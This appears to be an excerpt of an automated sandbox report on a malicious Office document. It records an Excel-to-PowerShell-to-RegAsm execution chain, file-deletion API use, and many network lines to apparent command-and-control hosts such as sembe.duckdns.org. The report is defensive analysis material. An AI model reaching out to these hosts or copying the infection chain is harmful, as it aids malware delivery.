            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: tny.wtf
            Source: global trafficDNS query: name: sembe.duckdns.org
            Source: global trafficDNS query: name: geoplugin.net
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.176.133:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
